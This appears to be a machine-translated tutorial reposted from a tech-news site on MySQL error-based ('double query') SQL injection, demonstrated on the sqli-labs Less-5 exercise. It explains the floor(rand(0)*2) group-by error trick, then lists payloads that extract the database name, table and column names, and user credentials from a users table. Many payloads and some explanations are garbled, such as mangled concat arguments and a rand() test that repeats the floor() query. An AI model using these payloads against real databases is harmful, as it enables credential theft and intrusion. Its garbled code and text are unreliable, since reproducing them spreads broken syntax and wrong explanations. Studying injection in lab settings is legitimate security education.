Shulou(Shulou.com)06/01 Report--

This article mainly explains "what is the blind note method of mysql get based on error report". The content of the explanation in the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "what is the blind note method of mysql get based on error report".

Error injection

Error injection means that the hacker makes a judgment according to the error echo during the injection process. Formally, there are two nested queries, namely select... (select...). The select inside is called a subquery, and its execution order is to execute the subquery first, and then to execute the select outside the line. Double injection mainly involves the following sql functions:

The rand () random function returns a value floor (a) between 0 and 1, and returns an integer count () aggregate function that is less than or equal to a, and the value is closest to a, also known as the counting function. It returns the total number of query objects in group by clause grouping statements, grouping according to the query results and displaying specific information by reporting errors. If you use rand () when querying, the value will be calculated multiple times. When using group by, floor (rand (0) * 2) is executed once, and if no record exists in the virtual table, it is executed again when the virtual table is inserted. Less-5 as an example to demonstrate

First use error injection: construction statement

1 'union select 1 from information_schema.columns group by count (*), concat (0x3a record0x3a, (select user (), 0x3amemery 0x3arecoery (rand (0) * 2)) a from information_schema.columns group by Amuri +

Display the results

Why this happens is because when an aggregate function, such as the count function, is followed by a grouping statement, a portion of the query is displayed in the wrong form.

So, learn about the functions in this statement (that is, the above four functions): connect to the database locally and query to test the use of concat ().

Input: select concat ('qwe','abc')

See qwe and abc stitched together

Then test the random function rand ():

Input statement: select floor (1.2343232); select floor (3.893)

For a total of three inputs, each output is random, but these numbers are all greater than 0 and less than 1.

Then test the floor () function

Input statement: select floor (1.2343232); select floor (3.893)

The output is less than or equal to the number of input.

Then test the combination of double injection queries

Input statement: select floor (rand () * 2)

To analyze, from the inside out, rand () * 2 can never be equal to 2, can never be less than 0; so floor rounding is 1, or 0.

Take a closer look and test:

Select concat ((select database ()), floor (rand () * 2))

See that concat merges the database with the following rounding. Similarly, in the first error statement in less-5, concat (0x3a dint 0x3a, (select user ()), 0x3a recorder 0x3a journal (rand (0) * 2)) a

0x3a is: number, so put them together.

If you add the from emails table at the end, the returned result is the set of security0 and security1. How many entries are there, depending on how many columns there are in the table.

Next, add the group by statement.

Select concat ((select database ()), floor (rand () * 2)) as a from information_schema.tables group by a

As an is to name the query concat ((select database ()), floor (rand () * 2)) with another a, and then group it with group by a. So the same security0 and security1 are divided into one group, that is, two groups, and there are two results.

Then we add the aggregate function count (*)

Select count (*), concat ((select database ()), floor (rand (0) * 2)) as a from information_schema.tables group by a

By the same token, less-5 first reported an error:

Reference tutorial

1. Expose the database

Construction statement:

1 'union select 1 limit 2 from (select count (*), concat ((select concat (0x3a recorder 0x3a database (), 0x3a journal 0x3a journal user (), 0x3a) rand (0) * 2) x from information_schema.tables group by x) a-- +

The page shows:

two。 Burst table

Construction statement:

1 'union select 1 from information_schema.tables where table_schema=database 2 from (select count (*), concat ((select concat (table_name,0x3a,0x3a) from information_schema.tables where table_schema=database () limit 0 Magnum 1), floor (rand (0) * 2) x from information_schema.tables group by x) a-- +

3. Reveal the column name

Construction statement:

1 'union select 1 from information_schema.columns where table_name='users' limit 2 from (select count (*), concat ((select concat (column_name,0x3a,0x3a) from information_schema.columns where table_name='users' limit 0pr 1), floor (rand (0) * 2) x from information_schema.columns group by x) a-- +

4. Get user information

Construction statement:

1 'union select 1 from security.users limit 2 from (select count (*), concat ((select concat (username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0) 1), floor (rand (0) * 2) x from information_schema.tables group by x) a-+ Thank you for reading. This is the content of "what is the blind note method of mysql get based on error reporting". After the study of this article, I believe that we have a deeper understanding of what is the blind injection method of mysql get based on error reporting, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.